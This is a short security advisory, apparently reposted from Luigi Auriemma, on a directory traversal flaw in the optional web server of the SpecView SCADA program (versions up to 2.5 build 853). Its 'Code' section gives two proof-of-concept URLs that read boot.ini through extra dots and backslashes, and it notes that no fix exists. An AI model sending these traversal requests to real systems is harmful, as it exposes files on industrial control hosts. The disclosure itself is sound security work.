Luigi Auriemma 程序: SpecView 影响版本 <= 2.5 build 853 测试平台: Windows 漏洞 web server directory traversal 作者 Luigi Auriemma 1)概述 2) Bug 3) The Code 4)修复 =============== 1)介绍说明 =============== SpecView is an easy to use SCADA software. ====== 2) Bug ====== The software has an option (disabled by default) that allows to run a web server for providing an updated screenshot of the program. This built-in web server is affected by a classical directory traversal attack through the usage of more than two dots. =========== 3) The Code =========== http://www.2cto.com /......boot.ini http://www.2cto.com /...\...\...\...\...\...\boot.ini ====== 4) 修复 ====== No fix.
查看更多关于SpecView <= 2.5 build 853目录遍历 - 网站安全 - 自学的详细内容...